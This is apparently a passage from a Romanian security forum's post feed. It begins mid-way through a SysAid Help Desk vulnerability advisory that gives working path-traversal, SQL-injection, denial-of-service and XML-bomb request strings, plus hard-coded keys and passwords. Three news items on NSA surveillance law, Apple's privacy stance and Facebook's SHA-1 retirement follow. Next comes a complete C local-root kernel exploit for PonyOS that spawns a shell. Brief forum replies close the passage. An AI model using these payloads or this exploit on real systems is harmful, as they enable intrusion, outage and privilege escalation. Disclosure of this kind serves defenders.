+ Rex::Text.rand_text_alphanumeric(8 + rand(10)), 'computerId' => Rex::Text.rand_text_alphanumeric(8 + rand(10)) } }) The response (res.body.to_s) will be similar to: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD><TITLE>Error</TITLE></HEAD> <BODY> <H1>Internal Error No#14</H1> <H2>/var/lib/tomcat7/webapps/sysaid/./WEB-INF/agentLogs/../../../../../../../../../../bla.war/111.war/1421678611732.zip (Permission denied)</H2> </BODY></HTML> The tomcat path is revealed between the H2 tags. 6) Vulnerability: Use of hard-coded cryptographic key CVE-2015-2998 Constraints: N/A Affected versions: unknown, at least 14.4 SysAid Help Desk uses a hard-coded encryption key and encryption parameters. If this is combined with an arbitrary file download vulnerability (such as #4), a malicious user can then decrypt the database password by downloading the WEB-INF/conf/serverConf.xml file. Algorithm: DES password based encryption with MD5 hash Key: "inigomontoya" Salt: [-87, -101, -56, 50, 86, 53, -29, 3] Iterations: 19 7) Vulnerability: SQL injection in genericreport, HelpDesk.jsp and RFCGantt.jsp CVE-2015-2999 Constraints: valid administrator account needed Affected versions: unknown, at least 14.4 a) POST /sysaid/genericreport HTTP/1.1 action=execute&reportName=AssetDetails&scheduleReportParm=null&reportTitle=Asset+Details&company=0&filter=group&groupFilter='&assetID=&assetName=Click+Browse+to+choose&expressionCaption=&customExpression=&customSQL=&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+06%3A27&reRunEvery=2&user1=admin Parameters: groupFilter action=execute&reportName=TopAdministratorsByAverageTimer&scheduleReportParm=null&reportTitle=Administrators+with+the+longest+SRs+time+%28average%29&sr_types=1&company=0&timer=1&expressionCaption=&customExpression=&customSQL=select+*+from+bla&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&NumRecords=5&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A03&reRunEvery=2&user1=admin&groupingSelection=Administrator&groupingSelectionName=Administrators&subGroupingSelection=AverageTimer&Activity=no Parameters: customSQL action=execute&reportName=ActiveRequests&scheduleReportParm=null&assetID=&reportTitle=Active+Records&category=000ALL&subcategory=000ALL&thirdLevelCategory=000ALL&sr_types=1&company=0&groupFilter=ALL&expressionCaption=&customExpression=&customSQL='&groupingSelection=Category&DatePeriod=1&fromDate=26-12-2014&toDate=27-01-2015&outFormat=PDF&userName1=admin&viewNow=checkbox&scheduleStart=26-01-2015+07%3A08&reRunEvery=2&user1=admin Parameters: customSQL (3 different payloads are shown because the reportName parameter seems to change which parameters have the injection) POST /sysaid/HelpDesk.jsp?helpdeskfrm&fromId=List&ajaxStyleList=YE resizeListViewDataArr=AccordionChange&fieldNameChangeState=&tabID=42&actionInfo=&builtFilter=&weightChangeNoAjax=&sort=r.id&dir=asc'&pageNo=1&showAll=0&toggleAll=0&isAccordion=0&calSearch=0&expandAll=0&action=&performAction=&${list.SrTypeFilter}hidden=&${list.category.caption}hidden=&${list.subCategory.caption}hidden=&${list.status.caption}hidden=&${list.requestUser.caption}hidden=&${list.assigned.to.caption}hidden=&${list.priority.caption}hidden=&selection=&selectionDisplay=&saveSelection=1&searchField=Search%20%20%20&dateType=&fromDate=&toDate=&ajaxShown=&multipleSelectionComboboxSet=SetMultipleSelectionCombobox&multipleSelectionComboboxStatus=&multipleSelectionComboboxPriority=&multipleSelectionComboboxAssignedTo= Parameter: dir c) POST /sysaid/RFCGantt.jsp HTTP/1.1 listName=Service+Requests+All&toInvalid=%27To+date%27+field+contains+an+invalid+value%21&fromInvalid=%27From+date%27+field+contains+an+invalid+value%21&listViewName=DEFAULT&ids=&flag=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&page=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&parentPageName=HelpDesk.jsp%3Fhelpdeskfrm%26fromId%3DList&computerID=null&ciId=null&returnToFunction=&srType=&ganttSQL=$select+*+from+ble;$SELECT+r.id,+r.sr_type,+r.account_id,+priority,+escalation,+status,+r.request_user,r.due_date,r.title,r.problem_type,r.problem_sub_type,r.sr_type,r.sr_weight,r.responsibility,r.responsible_manager,r.assigned_group+,+r.id,+r.id,+r.sr_type,+r.problem_type,r.problem_sub_type,r.third_level_category,+r.problem_sub_type,+r.title,+r.status,+r.request_user,+r.responsibility,+r.priority,+r.insert_time+from+service_req+r+++WHERE+r.account_id+%3d+%3f&lookupListName=&scrollPopup=NO&iframeID=null&paneCancelFunc=&filter=+AND+%28archive+%3D+0%29+&fromDate=null&toDate=null&isWeight=true Accepts injection between $$ in ganttSQL parameter. 8) Vulnerability: Denial of service CVE-2015-2996 (same CVE as #4) Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/calculateRdsFileChecksum?fileName=../../../../../../dev/zero This request will cause the cpu to go to 100% and the memory to balloon for 30+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). 9) Vulnerability: XML Entity Expansion (leading to denial of service) CVE-2015-3000 Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 a) POST /sysaid/agententry?deflate=0 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> POST /sysaid/rdsmonitoringresponse <lol bomb in POST data> c) POST /sysaid/androidactions <lol bomb in POST data> These requests will cause the cpu to go to 100% and the memory to baloon for 10+ seconds. Sending lots of requests causes the server to slow down to a crawl (although it doesn't seem to crash or hang forever). 10) Vulnerability: Uncontrolled file overwrite CVE-2015-2993 (same CVE as #1) Constraints: no authentication or any other information needed Affected versions: unknown, at least 14.4 GET /sysaid/userentry?accountId=1337&rdsName=bla&fileName=../../../service.htm This will overwrite the file with "SysAid". This string is fixed and cannot be controlled by the attacker. 11) Vulnerability: Use of hard-coded password for the SQL Server Express administrator account CVE-2015-3001 Constraints: N/A Affected versions: unknown, at least 14.4 When installing SysAid on Windows with the built in SQL Server Express, the installer sets the sa user password to "Password1". >> Fix: Upgrade to version 15.2 or higher. Source
  18. The NSA’s phone-snooping program is on its last legs after senators voted Tuesday to approve the USA Freedom Act, banning bulk collection of Americans’ data two years after the practice was revealed to the public by Edward Snowden. President Obama signed the bill late Tuesday, moving quickly to kick-start several Patriot Act powers that expired this weekend after senators missed a deadline for renewing them. But the bill, which cleared the Senate on a 67-32 vote, puts limits on a key power. Investigators still can demand businesses to turn over customers’ documents and records, but the data must be targeted to individuals or groups and cannot be done indiscriminately. The National Security Agency must end its snooping program within six months, forcing intelligence officials to set up a system that will leave the information with phone companies. Investigators will be able to submit a query only if they have a specific terrorism lead. “It’s the first major overhaul of government surveillance in decades and adds significant privacy protections for the American people,” said Sen. Patrick J. Leahy, a Vermont Democrat who led a two-year fight to end the NSA’s snooping. “Congress is ending the bulk collection of Americans’ phone records once and for all.” Supporters of the NSA program predicted that intelligence officials will not be able to get the same kinds of results if phone companies rather than government agencies hold the data. Senate Majority Leader Mitch McConnell, Kentucky Republican, said Mr. Obama will be blamed for weakening U.S. security and that the NSA program’s end was in line with the president’s opposition to detaining suspected terrorists at Guantanamo Bay, Cuba, and failing to confront the Islamic State. “The president’s efforts to dismantle our counterterrorism tools have not only been inflexible, they are especially ill-timed,” Mr. McConnell said. But it was the majority leader’s miscalculations about scheduling that backed NSA supporters into a corner. Mr. McConnell wanted the entire program to be extended and tried to use the June 1 expiration deadline to force fellow senators into a take-it-or-leave-it choice. But his colleagues, including a large percentage of Republicans, rejected his bid, sending the Senate over the deadline and undercutting Mr. McConnell’s leverage. On Tuesday, Mr. McConnell made a last-ditch effort to change the bill, doubling the six-month grace period for the NSA and requiring the government to certify that it could keep producing the same results even without storing the phone data itself. Even some senators who were sympathetic to his cause, though, voted against the amendments, saying any changes would have sent the bill back to the House and prolonged the fight, leaving the Patriot Act neutered in the meantime. Nearly half of Senate Republicans voted for the USA Freedom Act, joining all but one Democrat and a Democrat-leaning independent. The vote was a major vindication for the House, which for the second time this year has driven the legislative agenda on a major issue, striking a bipartisan compromise that senators were forced to accept. The bill also had the backing of the intelligence community, which has assured Congress that it won’t be giving up any major capabilities and can make the new system work even with the data held by phone companies instead of the NSA. Mr. Obama initially defended the program, but after several internal reviews found it to be ineffective and potentially illegal, he said he would support a congressional rewriting to end the law. The George W. Bush and Obama administrations justified the program under Section 215 of the Patriot Act, which gives federal investigators power to compel businesses to turn over customers’ documents and records. Using that power, the NSA demanded the metadata — the numbers, dates and durations involved — from all Americans’ calls. The information was stored and queried when investigators suspected a number was associated with terrorism and wanted to see who was calling whom. Backers said the program didn’t impinge on Americans’ liberty because the information, while stored by the government, wasn’t searched until there was a specific terrorism nexus. They said there were never any documented abuses of the program. But opponents said repeated reviews, including one last month by the Justice Department’s inspector general, found the program has never been responsible for a major break in a terrorism case. Given its ineffectiveness, they said, it was time to end it. Sen. Ron Wyden, an Oregon Democrat who had been battling behind closed doors for years as a member of the intelligence committee to end the program, said the vote was a first step. He said he and like-minded colleagues now will turn to other powers under the Foreign Intelligence Surveillance Act that the government uses to scoop up emails — a power Mr. Wyden said is increasingly gathering information on Americans, contrary to its intent. “This is only the beginning. There is a lot more to do,” he said. Some of Mr. Wyden’s colleagues in those fights, including Sen. Rand Paul, Kentucky Republican, voted against the USA Freedom Act. “Forcing us to choose between our rights and our safety is a false choice,” said Mr. Paul, who is running for the Republican presidential nomination and making his stand against the Patriot Act a major part of his campaign. Mr. Paul even used the obstruction powers the Senate gives to a single lawmaker to block action Sunday, sending Congress hurtling across the deadline and causing three powers to expire: the records collection, the ability to target “lone wolf” terrorists and the power to track suspected terrorists from phone to phone without obtaining a wiretap each time. The lone-wolf and wiretap powers were extended without changes. Source
  19. Apple chief Tim Cook has made a thinly veiled attack on Facebook and Google for "gobbling up" users' personal data. In a speech, he said people should not have to "make trade-offs between privacy and security". While not naming Facebook and Google explicitly, he attacked companies that "built their businesses by lulling their customers into complacency". Rights activists Privacy International told the BBC it had some scepticism about Mr Cook's comments. "It is encouraging to see Apple making the claim that they collect less information on us than their competitors," Privacy International's technologist Dr Richard Tynan said. "However, we have yet to see verifiable evidence of the implementation of these claims with regard to their hardware, firmware, software or online services. "It is crucial that our devices do not betray us." 'We think that's wrong' Addressing an audience in Washington DC, Mr Cook said: "I'm speaking to you from Silicon Valley, where some of the most prominent and successful companies have built their businesses by lulling their customers into complacency about their personal information. "They're gobbling up everything they can learn about you and trying to monetise it. We think that's wrong. And it's not the kind of company that Apple wants to be." Mr Cook had been given a corporate leadership award by the Electronic Privacy Information Centre, a US-based research group. According to TechCrunch, he later added that Apple "doesn't want your data". Google has not commented on Mr Cook's comments specifically, but a spokeswoman referred the BBC to the privacy section of its website, which the company has recently updated. "Ads are what enable us to make our services like Search, Gmail, and Maps free for everyone," one page reads. "We do not share information with advertisers in a way that personally identifies you, unless you gave us permission." Facebook suggested this page outlining how it collects user data. While Apple does not hold the same wealth of data looked after by Google and Facebook, it does use personal information to target advertising. A page for marketers on Apple's website offers "400 targeting options" for reaching users. It reads: "Whether you're looking for moms or business travellers or groups of your own customers, we've got you covered." Apple's lack of data, when compared with some of its rivals, could be a disadvantage for future devices. Services such as Google Now, which use stored data to predict what information users may need, require vast amounts of personal data to be effective. Advertising Mr Cook also spoke at length about encryption. His company introduced encryption measures by default to its devices late last year, a move heralded by privacy campaigners but heavily criticised by several governments. Mr Cook hit out at governments that had pressured technology companies to allow for so-called "backdoors" to aid with counter-terrorism and other enforcement. "There's another attack on our civil liberties that we see heating up every day," Mr Cook said. "It's the battle over encryption. Some in Washington are hoping to undermine the ability of ordinary citizens to encrypt their data." He added: "If you put a key under the mat for the cops, a burglar can find it too." Source
  20. Facebook has set the date: on September 30, the ancient and creaking SHA-1 hashing algorithm will make its tumbril trip and get the chop. SHA-1, designed by the NSA in 1995, is a one-way algorithm: a block of data is turned into a message digest. The digest can't be turned back into the original message, but serves as a digital signature confirming the authenticity of (for example) the software you've downloaded. And it's long been on the end-of-life list, because it's vulnerable to collision attacks – different blocks of data can present the same SHA-1 hash, allowing malware to verify as if it were authentic. From October 1, The Social NetworkTM says, third-party apps signed with SHA-1 will no longer be able to connect to Facebook. As Facebook's Adam Gross blogs, the move is in line with the Certificate Authority and Browser Forum's intention to sunset SHA-1 by January 2016. “We'll be updating our servers to stop accepting SHA-1 based connections before this final date, on October 1, 2015. After that date, we'll require apps and sites that connect to Facebook to support the more secure SHA-2 connections”, Gross wrote. Facebook recommends that “applications, SDKs, or devices that connect to Facebook” be checked for SHA-2 support, to avoid user irritation. The migration hasn't been without its detractors. Earlier this year, infosec bods told The Register the shift poses challenges. If users see disruption – for example, too many “insecure site” warnings – they fear that trust in the Internet will be undermined. Source
  21. # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 # Exploit Author: HackerFantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: [app version] PonyOS <= 3.0 # Tested on: PonyOS 3.0 # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh"); } Source @Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul.
  22. @Kronzy ne-am apucat de teste si pana la urma am reusi sa facem sa sara alertul. ) + rima.
  23. Am fost trecuti in HOF. https://technet.microsoft.com/en-us/security/cc308589.aspx
  • Create New...